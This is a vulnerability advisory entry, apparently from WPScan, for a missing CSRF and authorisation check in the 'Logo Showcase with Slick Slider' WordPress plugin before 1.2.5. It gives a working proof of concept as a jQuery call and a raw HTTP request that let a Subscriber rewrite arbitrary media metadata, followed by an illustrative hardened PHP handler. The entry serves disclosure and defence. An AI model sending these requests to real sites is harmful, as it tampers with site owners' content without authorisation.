wpvulndb | Apple502j | WPVDB-ID:D5534FF9-C4AF-46B7-8852-0F3DFD644855
History: Oct 24, 2021 - 12:00 a.m.

Logo Showcase with Slick Slider < 1.2.5 - Subscriber+ Arbitrary Media Title/Description/Alt Text/URL Update

2021-10-24 00:00:00
apple502j
wpscan.com
5

The plugin does not have CSRF and authorisation checks in the lswss_save_attachment_data AJAX action, allowing any authenticated user, such as a Subscriber, to change the title, description, alt text, and URL of arbitrary uploaded media.

PoC

jQuery.post(ajaxurl, {
    action: "lswss_save_attachment_data",
    attachment_id: 564,
    form_data: "lswss_attachment_title=Test&lswss_attachment_desc=Changed%20by%20subscriber&lswss_attachment_alt=Alt%20text&lswss_attachment_link="
})

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 213
Connection: close
Cookie: [any authenticated user]

action=lswss_save_attachment_data&attachment_id=2133&form_data=lswss_attachment_title%3DTest%26lswss_attachment_desc%3DChanged%2520by%2520subscriber%26lswss_attachment_alt%3DAlt%2520text%26lswss_attachment_link%3D
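
The two checks the description says are missing, shown as an added example of a hardened handler for this AJAX action; this is not the plugin's own code or its 1.2.5 fix. The handler name, the nonce action `lswss_save_attachment`, the `nonce` field, the `_lswss_link` meta key and the storage locations are assumptions.

```php
<?php
// Added illustration, not the plugin's code. Handler name, nonce action,
// 'nonce' field and the '_lswss_link' meta key are hypothetical.
add_action( 'wp_ajax_lswss_save_attachment_data', 'example_lswss_save_attachment_data' );

function example_lswss_save_attachment_data() {
    // CSRF check: the admin form must send a nonce created with
    // wp_create_nonce( 'lswss_save_attachment' ) in the 'nonce' field.
    if ( ! check_ajax_referer( 'lswss_save_attachment', 'nonce', false ) ) {
        wp_send_json_error( array( 'msg' => 'Invalid nonce.' ), 403 );
    }

    $attachment_id = isset( $_POST['attachment_id'] ) ? absint( $_POST['attachment_id'] ) : 0;

    // Object check: the ID must refer to an existing attachment.
    if ( ! $attachment_id || 'attachment' !== get_post_type( $attachment_id ) ) {
        wp_send_json_error( array( 'msg' => 'Unknown attachment.' ), 404 );
    }

    // Authorisation check: per-object capability, which a Subscriber does
    // not hold for media uploaded by other users.
    if ( ! current_user_can( 'edit_post', $attachment_id ) ) {
        wp_send_json_error( array( 'msg' => 'Not allowed.' ), 403 );
    }

    // form_data is itself a URL-encoded string, as in the request above.
    $form = array();
    $raw  = isset( $_POST['form_data'] ) ? wp_unslash( $_POST['form_data'] ) : '';
    wp_parse_str( is_string( $raw ) ? $raw : '', $form );
    $field = function ( $key ) use ( $form ) {
        return isset( $form[ $key ] ) && is_string( $form[ $key ] ) ? $form[ $key ] : '';
    };

    // Sanitise each value for its type; wp_slash() because these APIs unslash.
    wp_update_post( wp_slash( array(
        'ID'           => $attachment_id,
        'post_title'   => sanitize_text_field( $field( 'lswss_attachment_title' ) ),
        'post_content' => sanitize_textarea_field( $field( 'lswss_attachment_desc' ) ),
    ) ) );
    update_post_meta( $attachment_id, '_wp_attachment_image_alt',
        wp_slash( sanitize_text_field( $field( 'lswss_attachment_alt' ) ) ) );
    update_post_meta( $attachment_id, '_lswss_link',
        wp_slash( esc_url_raw( $field( 'lswss_attachment_link' ) ) ) );

    wp_send_json_success();
}
```

`wp_send_json_error()` ends the request, so nothing after a failed check runs.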

CPE

| Name | Operator | Version |
| --- | --- | --- |
| logo-showcase-with-slick-slider | lt | 1.2.5 |